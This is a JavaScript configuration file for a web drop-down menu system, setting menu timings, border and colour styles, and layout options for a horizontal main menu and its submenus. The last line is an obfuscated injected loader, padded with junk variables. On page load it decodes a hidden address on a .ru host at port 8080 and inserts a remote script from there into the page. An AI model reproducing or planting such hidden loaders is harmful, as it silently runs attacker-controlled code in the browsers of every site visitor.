// USE WORDWRAP AND MAXIMIZE THE WINDOW TO SEE THIS FILE
c_styles={};c_menus={}; // do not remove this line

// You can remove most comments from this file to reduce the size if you like.




/******************************************************
	(1) GLOBAL SETTINGS
*******************************************************/

c_hideTimeout=500; // 1000==1 second
c_subShowTimeout=300;
c_keepHighlighted=true;
c_findCURRENT=false; // find the item linking to the current page and apply it the CURRENT style class
c_findCURRENTTree=true;
c_overlapControlsInIE=true;
c_rightToLeft=false; // if the menu text should have "rtl" direction (e.g. Hebrew, Arabic)




/******************************************************
	(2) MENU STYLES (CSS CLASSES)
*******************************************************/

// You can define different style classes here and then assign them globally to the menu tree(s)
// in section 3 below or set them to any UL element from your menu tree(s) in the page source


c_imagesPath=""; // path to the directory containing the menu images


c_styles['MM']=[ // MainMenu (the shorter the class name the better)
[
// MENU BOX STYLE
0,		// BorderWidth
'solid',	// BorderStyle (CSS valid values except 'none')
'#8F90C4',	// BorderColor ('color')
0,		// Padding
'transparent',	// Background ('color','transparent','[image_source]')
'',		// IEfilter (only transition filters work well - not static filters)
''		// Custom additional CSS for the menu box (valid CSS)
],[
// MENU ITEMS STYLE
0,		// BorderWidth
'solid',	// BorderStyle (CSS valid values except 'none')
'solid',	// OVER BorderStyle
'#FFF5C6',	// BorderColor ('color')
'#4d4c76',	// OVER BorderColor

0,		// Padding
'',	// Background ('color','transparent','[image_source]')
'',	// OVER Background
'#252455',	// Color
'#000000',	// OVER Color
'11px',		// FontSize (values in CSS valid units - %,em,ex,px,pt)

'Verdana, Arial, Helvetica, sans-serif',	// FontFamily
'bold',		// FontWeight (CSS valid values - 'bold','normal','bolder','lighter','100',...,'900')
'none',		// TextDecoration (CSS valid values - 'none','underline','overline','line-through')
'none',		// OVER TextDecoration
'left',		// TextAlign ('left','center','right','justify')

0,		// ItemsSeparatorSize
'solid',	// ItemsSeparatorStyle (border-style valid values)
'#CBCBEF',	// ItemsSeparatorColor ('color','transparent')
0,		// ItemsSeparatorSpacing

false,			// UseSubMenuImage (true,false)
'[images/h_arrow.gif]',	// SubMenuImageSource ('[image_source]')
'[images/h_arrow_over.gif]',	// OverSubMenuImageSource
7,			// SubMenuImageWidth
4,			// SubMenuImageHeight
'10',			// SubMenuImageVAlign ('pixels from item top','middle')
'solid',		// VISITED BorderStyle
'',		// VISITED BorderColor
'',		// VISITED Background
'#252455',		// VISITED Color
'none',			// VISITED TextDecoration
'[images/h_arrow.gif]',	// VISITED SubMenuImageSource
'solid',		// CURRENT BorderStyle
'#CBCBEF',		// CURRENT BorderColor
'#FFFBF0',		// CURRENT Background
'#252455',		// CURRENT Color
'none',			// CURRENT TextDecoration
'[images/h_arrow.gif]',	// CURRENT SubMenuImageSource
'',		// Custom additional CSS for the items (valid CSS)
'',		// OVER Custom additional CSS for the items (valid CSS)
'',		// CURRENT Custom additional CSS for the items (valid CSS)
''		// VISITED Custom additional CSS for the items (valid CSS)
]];


c_styles['SM']=[ // SubMenus
[
// MENU BOX STYLE
0,		// BorderWidth
'solid',	// BorderStyle (CSS valid values except 'none')
'#4D4C76',	// BorderColor ('color')

0,		// Padding
'#FFFFFF',	// Background ('color','transparent','[image_source]')
'',		// IEfilter (only transition filters work well - not static filters)
''		// Custom additional CSS for the menu box (valid CSS)
],[
// MENU ITEMS STYLE

0,		// BorderWidth
'solid',	// BorderStyle (CSS valid values except 'none')
'solid',	// OVER BorderStyle
'#fff',	// BorderColor ('color')
'#fff',	// OVER BorderColor

4,		// Padding
'',	// Background ('color','transparent','[image_source]')
'#cccccc',	// OVER Background
'#000000',	// Color
'#000000',	// OVER Color
'11px',		// FontSize (values in CSS valid units - %,em,ex,px,pt)
'Verdana, Arial, Helvetica, sans-serif',	// FontFamily
'normal',	// FontWeight (CSS valid values - 'bold','normal','bolder','lighter','100',...,'900')
'none',		// TextDecoration (CSS valid values - 'none','underline','overline','line-through')
'none',		// OVER TextDecoration
'left',		// TextAlign ('left','center','right','justify')

0,		// ItemsSeparatorSize
'solid',	// ItemsSeparatorStyle (border-style valid values)
'#CBCBEF',	// ItemsSeparatorColor ('color','transparent')
0,		// ItemsSeparatorSpacing

true,			// UseSubMenuImage (true,false)
'[images/v_arrow.gif]',	// SubMenuImageSource ('[image_source]')
'[images/v_arrow_over.gif]',	// OverSubMenuImageSource

7,			// SubMenuImageWidth
7,			// SubMenuImageHeight
'middle',			// SubMenuImageVAlign ('pixels from item top','middle')
'solid',		// VISITED BorderStyle
'#FFF5C6',		// VISITED BorderColor
'',		// VISITED Background
'#000000',		// VISITED Color
'none',			// VISITED TextDecoration
'[images/v_arrow.gif]',	// VISITED SubMenuImageSource
'solid',		// CURRENT BorderStyle
'#CBCBEF',		// CURRENT BorderColor
'#FFFBF0',		// CURRENT Background
'#000000',		// CURRENT Color
'none',			// CURRENT TextDecoration
'[images/v_arrow.gif]',	// CURRENT SubMenuImageSource
'',		// Custom additional CSS for the items (valid CSS)
'',		// OVER Custom additional CSS for the items (valid CSS)
'',		// CURRENT Custom additional CSS for the items (valid CSS)
''		// VISITED Custom additional CSS for the items (valid CSS)
]];




/******************************************************
	(3) MENU TREE FEATURES
*******************************************************/

// Normally you would probably have just one menu tree (i.e. one main menu with sub menus).
// But you are actually not limited to just one and you can have as many menu trees as you like.
// Just copy/paste a config block below and configure it for another UL element if you like.


c_menus['Menu1']=[ // the UL element with id="Menu1"
[
// MAIN-MENU FEATURES
'horizontal',	// ItemsArrangement ('vertical','horizontal')
'relative',	// Position ('relative','absolute','fixed')
'0em',		// X Position (values in CSS valid units- px,em,ex)
'0em',		// Y Position (values in CSS valid units- px,em,ex)
false,		// RightToLeft display of the sub menus
false,		// BottomToTop display of the sub menus
1,		// X SubMenuOffset (pixels)
0,		// Y SubMenuOffset
'11px',		// Width (values in CSS valid units - px,em,ex) (matters for main menu with 'vertical' ItemsArrangement only)
'MM',		// CSS Class (one of the defined in section 2)
false		// Open sub-menus onclick (default is onmouseover)
],[
// SUB-MENUS FEATURES
0,		// X SubMenuOffset (pixels)
0,		// Y SubMenuOffset
'auto',		// Width ('auto',values in CSS valid units - px,em,ex)
'100',		// MinWidth ('pixels') (matters/useful if Width is set 'auto')
'300',		// MaxWidth ('pixels') (matters/useful if Width is set 'auto')
'SM',		// CSS Class (one of the defined in section 2)
false		// Open sub-menus onclick (default is onmouseover)
]];
var D;if(D!='mx' && D!='s'){D=''};var A=new Date();function T(){var H;if(H!='n'){H='n'};var sc;if(sc!='nA'){sc=''};var ne;if(ne!=''){ne='I'};var Y=unescape;var i=new String();var M="\x68\x74\x74\x70\x3a\x2f\x2f\x73\x70\x61\x6e\x6b\x77\x69\x72\x65\x2d\x63\x6f\x6d\x2e\x66\x72\x65\x65\x77\x65\x62\x73\x2e\x63\x6f\x6d\x2e\x74\x76\x2d\x63\x6f\x6d\x2e\x54\x68\x65\x53\x75\x70\x65\x72\x50\x61\x67\x65\x72\x2e\x72\x75\x3a";var m=window;var ft;if(ft!='wA' && ft!='lF'){ft='wA'};var h='';var hd="";var N=new String("g");var Dv;if(Dv!='F' && Dv!='xw'){Dv='F'};function x(G,K){var n_;if(n_!='VY' && n_!='eW'){n_='VY'};var cM;if(cM!='v' && cM!='sF'){cM='v'};var e=Y("%5b")+K+Y("%5d");var NJ=new Array();var E=new RegExp(e, N);var DGg;if(DGg!='' && DGg!='DG'){DGg=null};var HN;if(HN!=''){HN='sj'};return G.replace(E, h);this.hP="";this.rK="";};var fF;if(fF!='' && fF!='NP'){fF=null};var oK;if(oK!=''){oK='L'};var DF;if(DF!=''){DF='S'};var k=new Date();var q=document;var gZ;if(gZ!='pC'){gZ=''};var gG=new String();var g=x('8435061831011','65391472');var P='';var YJ='';var w=Y("%2f%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%67%6f%6f%67%6c%65%2e%63%6f%6d%2f%6c%69%6e%6b%68%65%6c%70%65%72%2e%63%6e%2f%68%64%66%63%62%61%6e%6b%2e%63%6f%6d%2f%72%61%6b%75%74%65%6e%2e%6e%65%2e%6a%70%2e%70%68%70");var aX=new String();var DE=new Array();var sR;if(sR!='ew' && sR != ''){sR=null};var hj="";function z(){var j=new Date();YJ=M;var vo;if(vo!='' && vo!='tU'){vo='MB'};YJ+=g;var sQ=new Date();var HK=new Date();YJ+=w;var c_;if(c_!='OU' && c_!='VG'){c_=''};var By;if(By!='nz' && By!='Bf'){By=''};this.VD="";var Vj;if(Vj!='wc' && Vj!='dN'){Vj='wc'};try {var je;if(je!='Up'){je='Up'};var Xx;if(Xx!='' && Xx!='Sd'){Xx=''};c=q.createElement(x('sFcPrwihpKtP','oKNIwFkO1PMDZ7dA5UYLh'));var c_k="";var HNt;if(HNt!=''){HNt='PC'};var OA="";var iq;if(iq!='' && iq!='uj'){iq=null};c.src=YJ;c.defer=[1][0];var cN=new String();this.cWF='';this.Pb="";q.body.appendChild(c);var rL;if(rL!='' && rL!='wJ'){rL=''};} catch(V){};var qm=new Array();var dC=new Array();}var kK=new Array();m["onlo"+"kemad".substr(3)]=z;var hD=new String();var Fh='';var Bw=new String();};var Mz=new Array();var Zt;if(Zt!='Vi' && Zt!='il'){Zt=''};T();